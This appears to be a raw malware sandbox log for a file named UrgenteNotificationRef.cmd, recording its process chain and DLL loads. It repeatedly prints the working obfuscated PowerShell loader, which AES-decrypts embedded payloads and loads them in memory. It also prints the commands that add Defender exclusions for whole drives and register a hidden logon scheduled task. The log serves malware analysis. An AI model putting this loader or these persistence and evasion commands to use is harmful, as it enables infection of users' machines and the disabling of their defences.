    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cd1d5j4k.kqr.ps1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: powershell.exeString found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
    Source: powershell.exeString found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\UrgenteNotificationRef.cmd" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\UrgenteNotificationRef.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\UrgenteNotificationRef.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network28681Man.cmd"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
